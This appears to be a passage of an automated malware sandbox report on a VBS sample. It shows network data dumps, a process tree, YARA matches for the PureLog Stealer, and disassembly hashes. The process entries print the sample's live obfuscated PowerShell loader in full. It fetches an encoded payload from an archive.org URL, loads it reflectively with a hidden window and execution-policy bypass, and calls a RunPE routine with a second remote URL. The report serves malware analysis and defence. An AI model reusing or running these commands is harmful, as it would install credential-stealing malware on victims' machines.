                                              Data Ascii: MAAAEo8gMABijzAwAGExQgBQAAAH7FCAAEexIJAAQ6Bef//yYgAQAAADj65v//AAKllQAAAXOMAQAKjJcAAAETAyAgAAAAON3m//8AEQHQCgAAASjyAwAGKPMDAAYTHyAKAAAAOL/m//84sO///yALAAAAfsUIAAR73wgABDqm5v//JiBJAAAAOJvm//842Pr//yB2AAAAOIzm//8AAm8lAAAKKKIAAAooAAQABoyWAAABEwMgDwAAAP4OLgA4Y
                                              2024-10-02 03:23:18 UTC16384INData Raw: 45 41 41 41 42 2b 78 51 67 41 42 48 76 71 43 41 41 45 4f 53 37 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 49 2f 2f 2f 2f 77 41 54 4d 41 51 41 52 67 41 41 41 4d 73 41 41 42 45 41 41 67 4d 45 4b 50 30 42 41 41 6f 41 41 6e 76 38 41 51 41 4b 4f 68 67 41 41 41 41 44 46 6a 38 52 41 41 41 41 41 77 49 6f 2f 67 45 41 43 76 34 43 46 76 34 42 4f 41 45 41 41 41 41 57 43 67 59 35 45 41 41 41 41 41 41 43 65 2f 51 42 41 41 6f 44 42 47 2f 65 41 51 41 4b 41 41 41 71 41 41 41 54 4d 41 51 41 6c 51 45 41 41 41 51 41 41 42 45 67 41 77 41 41 41 50 34 4f 41 41 41 34 41 41 41 41 41 50 34 4d 41 41 42 46 43 77 41 41 41 4b 77 41 41 41 43 48 41 41 41 41 30 77 41 41 41 4f 49 41 41 41 42 55 41 41 41 41 4b 51 41 41 41 41 55 41 41 41 42 45 41 41 41 41 47 67 45 41 41 50 51 41 41 41 43 71 41
                                              Data Ascii: EAAAB+xQgABHvqCAAEOS7///8mIAEAAAA4I////wATMAQARgAAAMsAABEAAgMEKP0BAAoAAnv8AQAKOhgAAAADFj8RAAAAAwIo/gEACv4CFv4BOAEAAAAWCgY5EAAAAAACe/QBAAoDBG/eAQAKAAAqAAATMAQAlQEAAAQAABEgAwAAAP4OAAA4AAAAAP4MAABFCwAAAKwAAACHAAAA0wAAAOIAAABUAAAAKQAAAAUAAABEAAAAGgEAAPQAAACqA
                                              2024-10-02 03:23:18 UTC16384INData Raw: 41 44 41 6e 74 45 41 67 41 4b 2f 67 51 4c 42 7a 6b 67 41 41 41 41 41 41 4a 37 52 51 49 41 43 67 4d 43 65 30 55 43 41 41 6f 44 46 31 67 43 65 30 51 43 41 41 6f 44 57 53 6a 51 41 51 41 4b 41 41 41 43 65 30 55 43 41 41 6f 44 42 4b 51 31 41 41 41 62 41 67 4a 37 52 41 49 41 43 68 64 59 66 55 51 43 41 41 6f 71 41 41 41 54 4d 41 4d 41 54 77 41 41 41 41 4d 42 41 42 45 41 41 6e 74 45 41 67 41 4b 43 6a 67 75 41 41 41 41 41 41 59 58 57 51 6f 43 65 30 55 43 41 41 6f 47 6f 7a 55 41 41 42 75 4d 4e 51 41 41 47 77 4f 4d 4e 51 41 41 47 2f 34 42 43 77 63 35 43 41 41 41 41 41 41 47 44 44 67 54 41 41 41 41 41 41 59 57 2f 67 49 4e 43 54 72 48 2f 2f 2f 2f 46 51 77 34 41 41 41 41 41 41 67 71 41 42 4d 77 41 77 41 74 41 41 41 41 62 41 41 41 45 51 41 43 41 79 6a 47 41 51 41 4b 43
                                              Data Ascii: ADAntEAgAK/gQLBzkgAAAAAAJ7RQIACgMCe0UCAAoDF1gCe0QCAAoDWSjQAQAKAAACe0UCAAoDBKQ1AAAbAgJ7RAIAChdYfUQCAAoqAAATMAMATwAAAAMBABEAAntEAgAKCjguAAAAAAYXWQoCe0UCAAoGozUAABuMNQAAGwOMNQAAG/4BCwc5CAAAAAAGDDgTAAAAAAYW/gINCTrH////FQw4AAAAAAgqABMwAwAtAAAAbAAAEQACAyjGAQAKC


                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              High Level Behavior Distribution

                                              Click to dive into process behavior distribution

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Target ID:0
                                              Start time:23:23:12
                                              Start date:01/10/2024
                                              Path:C:\Windows\System32\wscript.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\0BO4n723Q8.vbs"
                                              Imagebase:0x7ff7bf320000
                                              File size:170'496 bytes
                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:2
                                              Start time:23:23:13
                                              Start date:01/10/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRlTnY6Q29tU3BlQ1s0LDI0LDI1XS1qb2luJycpICgoJzc5JysnZHVybCA9JysnIEtxamh0JysndHBzJysnOi8vaWE2MDAxMDAuJysndXMuJysnYXJjaGl2ZS5vcmcvJysnMjQvaXRlbXMvZGUnKyd0YWgtbm90ZS12L0RlJysndGFoTicrJ290ZScrJ1YudHh0S3FqJysnOzcnKyc5ZGJhc2U2NENvbnRlbicrJ3QgJysnPScrJyAoTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlcnKydlYicrJ0NsaWUnKydudCkuRG93bmxvYScrJ2RTdHJpbmcoNzlkdScrJ3JsKTs3JysnOWRiaW5hJysncnknKydDb250JysnZW50ID0nKycgJysnW1N5Jysnc3RlbS5DbycrJ24nKyd2ZXJ0JysnXTo6JysnRnJvbUJhc2UnKyc2JysnNFN0cmluZygnKyc3JysnOWRiYXNlNjRDb250ZW50KTs3JysnOWQnKydhc3NlbWInKydseSA9IFtSJysnZWYnKydsJysnZWN0aScrJ29uLkEnKydzJysnc2VtYmx5XTo6TG9hZCg3OWRiaW5hcicrJ3lDbycrJ250ZW50KScrJzsnKyc3OScrJ2R0eXBlID0nKycgNzlkJysnYXNzZW1ibCcrJ3kuR2V0VCcrJ3lwZShLJysncWonKydSJysndW5QRScrJy5Ib21lJysnS3FqKTsnKyc3OWRtJysnZXRob2QgPSAnKyc3OWR0eScrJ3AnKydlLkcnKydldE1ldGhvJysnZCgnKydLcScrJ2onKydWQUlLcScrJ2opOzc5ZG1ldGhvZC5JbnZvJysna2UoNzlkJysnbnUnKydsbCwnKycgW29iamVjJysndFtdXScrJ0AoS3FqJysndHgnKyd0LkhUT01SLzAzMS84NDIuODQxLjI3MS43MDEvLycrJzpwdHRoSycrJ3FqICwgS3FqJysnZGUnKydzYXRpdicrJ2Fkb0txaiAsIEtxamRlc2F0aXZhZCcrJ29LcWonKycgLCBLcWpkZScrJ3NhdGl2YWRvS3FqLEtxalJlZ0EnKydzbUtxaicrJywnKydLJysncWpLcScrJ2onKycpKScpLlJFUGxBY2UoKFtjaGFyXTU1K1tjaGFyXTU3K1tjaGFyXTEwMCksJyQnKS5SRVBsQWNlKChbY2hhcl03NStbY2hhcl0xMTMrW2NoYXJdMTA2KSxbc3RySW5nXVtjaGFyXTM5KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                              Imagebase:0x7ff6eb350000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:3
                                              Start time:23:23:13
                                              Start date:01/10/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff68cce0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:4
                                              Start time:23:23:15
                                              Start date:01/10/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $eNv:ComSpeC[4,24,25]-join'') (('79'+'durl ='+' Kqjht'+'tps'+'://ia600100.'+'us.'+'archive.org/'+'24/items/de'+'tah-note-v/De'+'tahN'+'ote'+'V.txtKqj'+';7'+'9dbase64Conten'+'t '+'='+' (New-Object System.Net.W'+'eb'+'Clie'+'nt).Downloa'+'dString(79du'+'rl);7'+'9dbina'+'ry'+'Cont'+'ent ='+' '+'[Sy'+'stem.Co'+'n'+'vert'+']::'+'FromBase'+'6'+'4String('+'7'+'9dbase64Content);7'+'9d'+'assemb'+'ly = [R'+'ef'+'l'+'ecti'+'on.A'+'s'+'sembly]::Load(79dbinar'+'yCo'+'ntent)'+';'+'79'+'dtype ='+' 79d'+'assembl'+'y.GetT'+'ype(K'+'qj'+'R'+'unPE'+'.Home'+'Kqj);'+'79dm'+'ethod = '+'79dty'+'p'+'e.G'+'etMetho'+'d('+'Kq'+'j'+'VAIKq'+'j);79dmethod.Invo'+'ke(79d'+'nu'+'ll,'+' [objec'+'t[]]'+'@(Kqj'+'tx'+'t.HTOMR/031/842.841.271.701//'+':ptthK'+'qj , Kqj'+'de'+'sativ'+'adoKqj , Kqjdesativad'+'oKqj'+' , Kqjde'+'sativadoKqj,KqjRegA'+'smKqj'+','+'K'+'qjKq'+'j'+'))').REPlAce(([char]55+[char]57+[char]100),'$').REPlAce(([char]75+[char]113+[char]106),[strIng][char]39) )"
                                              Imagebase:0x7ff6eb350000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000002.1853253841.000001C46DDF0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000002.1834352585.000001C465BDC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:high
                                              Has exited:true

                                              Disassembly

                                              Reset < >

                                                Executed Functions

                                                Function 00007FFE7DC837B5 Relevance: .0, Instructions: 49COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.1876285098.00007FFE7DC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DC80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7ffe7dc80000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                • Instruction ID: 0150b21b151da0f64b154ab05bb85768ec5e4adbc6127a33efda7c282161de9c
                                                • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                • Instruction Fuzzy Hash: A101A77111CB0D4FD744EF0CE051AA6B3E0FB85320F10056EE58AC3661D632E892CB42

                                                Executed Functions

                                                Function 00007FFE7DD70E13 Relevance: .1, Instructions: 123COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1857190018.00007FFE7DD70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DD70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ffe7dd70000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6a7364e381683c08937b944c7d62e51587a8bc8c9de58ae37835a6ff19eb5818
                                                • Instruction ID: e04971c8bb664cabb31322d2749ab3e5e9880649305ba19ad2f326569eb2274a
                                                • Opcode Fuzzy Hash: 6a7364e381683c08937b944c7d62e51587a8bc8c9de58ae37835a6ff19eb5818
                                                • Instruction Fuzzy Hash: F741592285E7C54FE36397785C261A8BFB0AF13364F1D06FAD198DB0E3E9596809C352
                                                Function 00007FFE7DD70DDF Relevance: .1, Instructions: 122COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1857190018.00007FFE7DD70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DD70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ffe7dd70000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5538282e36affe3941cd3850183b9b775b66b4db9fa455dac736cba6b5317007
                                                • Instruction ID: 1ed47e492a16a43f8924b2d5d82952d8323b79abdb6359c183045f9aee912e17
                                                • Opcode Fuzzy Hash: 5538282e36affe3941cd3850183b9b775b66b4db9fa455dac736cba6b5317007
                                                • Instruction Fuzzy Hash: E6418A2285E7C54FE363A7784C251A87FB0AF13360F1902FBD198DB0E3E959680AC352
                                                Function 00007FFE7DD7049A Relevance: .1, Instructions: 61COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1857190018.00007FFE7DD70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DD70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ffe7dd70000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 576c25bf4cc79e0d92c99bacbe0d7a5cf61514d5ae7e964cbc8afb52a3d36652
                                                • Instruction ID: 47aa21a3373e02aa51e7be065db77cbfe60963273d5ac250792ae04afb5c38b9
                                                • Opcode Fuzzy Hash: 576c25bf4cc79e0d92c99bacbe0d7a5cf61514d5ae7e964cbc8afb52a3d36652
                                                • Instruction Fuzzy Hash: 1B018833B1DA194EF6B0556CA8152F9B3E5FF84274F1443B7C56EE31D4EA15981542C0
                                                Function 00007FFE7DD776C1 Relevance: .1, Instructions: 59COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1857190018.00007FFE7DD70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DD70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ffe7dd70000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3d83d2fe34477e80060e089b681135e04c92a56eec93b07a2f756d5012554fa3
                                                • Instruction ID: 6726df076d3f457e631a5dc2daaa23ef18b435a1f83d10829c286014c9aba3d5
                                                • Opcode Fuzzy Hash: 3d83d2fe34477e80060e089b681135e04c92a56eec93b07a2f756d5012554fa3
                                                • Instruction Fuzzy Hash: 8501DB12E1EDC91FE7A2932C14143BD66D2EF8533476906FBC56CC32A6EC198C054381
                                                Function 00007FFE7DCA63C5 Relevance: .0, Instructions: 49COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1856723965.00007FFE7DCA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DCA0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ffe7dca0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9c713d78201c83672d4d45f4d4eaf3b6135bbc1507e1565cefba94a3291e539b
                                                • Instruction ID: 26e0859f9b5db8ba84c15cf3ff0aebbd56964431440a360cf9dbcf4880f2359f
                                                • Opcode Fuzzy Hash: 9c713d78201c83672d4d45f4d4eaf3b6135bbc1507e1565cefba94a3291e539b
                                                • Instruction Fuzzy Hash: 1A01A73111CB0C8FD744EF0CE051AA5B3E0FB85320F10056EE58AC3661D632E882CB42
                                                Function 00007FFE7DD73945 Relevance: .0, Instructions: 28COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1857190018.00007FFE7DD70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DD70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ffe7dd70000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5481b08f5ae89911ed83c53805a253d20ea08947212cbc04157291c590b7c206
                                                • Instruction ID: e2de69baf49e44671f2439b58ef9bf51f5b0417ee9a6fc9f897307992f61654e
                                                • Opcode Fuzzy Hash: 5481b08f5ae89911ed83c53805a253d20ea08947212cbc04157291c590b7c206
                                                • Instruction Fuzzy Hash: 5DE09B33E0E54C4FEB55EB6894411DCBBA0DB59361F2905BFD01DD2553E91558418351
                                                Function 00007FFE7DD7772A Relevance: .0, Instructions: 21COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1857190018.00007FFE7DD70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DD70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ffe7dd70000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 20e63fe6f06570adbcbbb2e79880d5012006745799b889f958dbd2b215a69219
                                                • Instruction ID: f540f0d6fde9e3c55d012f92bec95ebbf3b29aab0982e7f807d0540020fb3770
                                                • Opcode Fuzzy Hash: 20e63fe6f06570adbcbbb2e79880d5012006745799b889f958dbd2b215a69219
                                                • Instruction Fuzzy Hash: 40D01721A28D0E5AE3A6A6280008276A0D3EFC8226BA54679902DC33A9ED39D8464340
                                                Function 00007FFE7DD758B6 Relevance: .0, Instructions: 21COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1857190018.00007FFE7DD70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DD70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ffe7dd70000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7153d0b4c9150c7e25c51e70ec91373566be709cd9e7bad5bb55341582312f38
                                                • Instruction ID: 23c93533440a0decd53cd7a4132e645fdcfdef42a18e88ff9e70c642e64c640b
                                                • Opcode Fuzzy Hash: 7153d0b4c9150c7e25c51e70ec91373566be709cd9e7bad5bb55341582312f38
                                                • Instruction Fuzzy Hash: FFE08C12B0EAC90FEB91AA2848581AC2BE2DB5926136804FFC02DC62A7EC584C498741
                                                Function 00007FFE7DD704D2 Relevance: .0, Instructions: 16COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1857190018.00007FFE7DD70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DD70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ffe7dd70000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ed455d182062060ae9b4a6c151562ae35496221616fe52b13ceecc28a0b3235e
                                                • Instruction ID: 349e4921433b6c3acb644e18c592ad0c31850210870b3aa9dfc1bea1a06a6a02
                                                • Opcode Fuzzy Hash: ed455d182062060ae9b4a6c151562ae35496221616fe52b13ceecc28a0b3235e
                                                • Instruction Fuzzy Hash: E8C01211F59D1E0A61A5512C101D3BD02C2EB9816075443B6540ED7299DC149C060240